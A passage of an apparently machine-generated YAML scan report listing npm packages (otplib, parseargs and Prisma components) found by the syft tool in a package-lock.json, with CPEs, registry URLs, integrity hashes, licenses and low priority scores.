source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40otplib/plugin-crypto@12.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz
|
|
integrity: sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g==
|
|
dependencies:
|
|
'@otplib/core': ^12.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 58e5f41c022201bb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @otplib/plugin-thirty-two 12.0.1'
|
|
title: '@otplib/plugin-thirty-two 12.0.1'
|
|
description: 'Package discovered: @otplib/plugin-thirty-two 12.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 104b985242c58dc2
|
|
name: '@otplib/plugin-thirty-two'
|
|
version: 12.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40otplib/plugin-thirty-two@12.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz
|
|
integrity: sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA==
|
|
dependencies:
|
|
'@otplib/core': ^12.0.1
|
|
thirty-two: ^1.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: de3f341e44725439
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @otplib/preset-default 12.0.1'
|
|
title: '@otplib/preset-default 12.0.1'
|
|
description: 'Package discovered: @otplib/preset-default 12.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 05997a7e636d9fd8
|
|
name: '@otplib/preset-default'
|
|
version: 12.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40otplib/preset-default@12.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz
|
|
integrity: sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ==
|
|
dependencies:
|
|
'@otplib/core': ^12.0.1
|
|
'@otplib/plugin-crypto': ^12.0.1
|
|
'@otplib/plugin-thirty-two': ^12.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 61834b2dc1830a08
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @otplib/preset-v11 12.0.1'
|
|
title: '@otplib/preset-v11 12.0.1'
|
|
description: 'Package discovered: @otplib/preset-v11 12.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 59bf565b491e939f
|
|
name: '@otplib/preset-v11'
|
|
version: 12.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40otplib/preset-v11@12.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz
|
|
integrity: sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg==
|
|
dependencies:
|
|
'@otplib/core': ^12.0.1
|
|
'@otplib/plugin-crypto': ^12.0.1
|
|
'@otplib/plugin-thirty-two': ^12.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 242a3037b85d7c4e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @pkgjs/parseargs 0.11.0'
|
|
title: '@pkgjs/parseargs 0.11.0'
|
|
description: 'Package discovered: @pkgjs/parseargs 0.11.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 060c7b7a8f614664
|
|
name: '@pkgjs/parseargs'
|
|
version: 0.11.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@pkgjs\/parseargs:\@pkgjs\/parseargs:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40pkgjs/parseargs@0.11.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz
|
|
integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 83a6bc7b54c525e8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @prisma/client 5.22.0'
|
|
title: '@prisma/client 5.22.0'
|
|
description: 'Package discovered: @prisma/client 5.22.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c440900ad881e975
|
|
name: '@prisma/client'
|
|
version: 5.22.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@prisma\/client:\@prisma\/client:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40prisma/client@5.22.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@prisma/client/-/client-5.22.0.tgz
|
|
integrity: sha512-M0SVXfyHnQREBKxCgyo7sffrKttwE6R8PMq330MIUF0pTwjUhLbW84pFDlf06B27XyCR++VtjugEnIHdr07SVA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 888b8378fb32621d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @prisma/debug 5.22.0'
|
|
title: '@prisma/debug 5.22.0'
|
|
description: 'Package discovered: @prisma/debug 5.22.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9f4e1fa5bdb80e5a
|
|
name: '@prisma/debug'
|
|
version: 5.22.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@prisma\/debug:\@prisma\/debug:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40prisma/debug@5.22.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@prisma/debug/-/debug-5.22.0.tgz
|
|
integrity: sha512-AUt44v3YJeggO2ZU5BkXI7M4hu9BF2zzH2iF2V5pyXT/lRTyWiElZ7It+bRH1EshoMRxHgpYg4VB6rCM+mG5jQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1e736006ff85bb23
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @prisma/engines 5.22.0'
|
|
title: '@prisma/engines 5.22.0'
|
|
description: 'Package discovered: @prisma/engines 5.22.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0f98eed7c2a9484e
|
|
name: '@prisma/engines'
|
|
version: 5.22.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40prisma/engines@5.22.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@prisma/engines/-/engines-5.22.0.tgz
|
|
integrity: sha512-UNjfslWhAt06kVL3CjkuYpHAWSO6L4kDCVPegV6itt7nD1kSJavd3vhgAEhjglLJJKEdJ7oIqDJ+yHk6qO8gPA==
|
|
dependencies:
|
|
'@prisma/debug': 5.22.0
|
|
'@prisma/engines-version': 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
|
|
'@prisma/fetch-engine': 5.22.0
|
|
'@prisma/get-platform': 5.22.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c3ee871894c65f6a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2'
|
|
title: '@prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2'
|
|
description: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3a15a4d5b57a6a32
|
|
name: '@prisma/engines-version'
|
|
version: 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@prisma/engines-version/-/engines-version-5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2.tgz
|
|
integrity: sha512-2PTmxFR2yHW/eB3uqWtcgRcgAbG1rwG9ZriSvQw+nnb7c4uCr3RAcGMb6/zfE88SKlC1Nj2ziUvc96Z379mHgQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 17f0b8bb58a0d4a7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @prisma/fetch-engine 5.22.0'
|
|
title: '@prisma/fetch-engine 5.22.0'
|
|
description: 'Package discovered: @prisma/fetch-engine 5.22.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 373747b9463a5333
|
|
name: '@prisma/fetch-engine'
|
|
version: 5.22.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40prisma/fetch-engine@5.22.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@prisma/fetch-engine/-/fetch-engine-5.22.0.tgz
|
|
integrity: sha512-bkrD/Mc2fSvkQBV5EpoFcZ87AvOgDxbG99488a5cexp5Ccny+UM6MAe/UFkUC0wLYD9+9befNOqGiIJhhq+HbA==
|
|
dependencies:
|
|
'@prisma/debug': 5.22.0
|
|
'@prisma/engines-version': 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2
|
|
'@prisma/get-platform': 5.22.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d7f7c5d00389674a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @prisma/get-platform 5.22.0'
|
|
title: '@prisma/get-platform 5.22.0'
|
|
description: 'Package discovered: @prisma/get-platform 5.22.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 35191eb100a1fadc
|
|
name: '@prisma/get-platform'
|
|
version: 5.22.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40prisma/get-platform@5.22.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@prisma/get-platform/-/get-platform-5.22.0.tgz
|
|
integrity: sha512-pHhpQdr1UPFpt+zFfnPazhulaZYCUqeIcPpJViYoq9R+D/yw4fjE+CtnsnKzPYm0ddUbeXUzjGVGIRVgPDCk4Q==
|
|
dependencies:
|
|
'@prisma/debug': 5.22.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
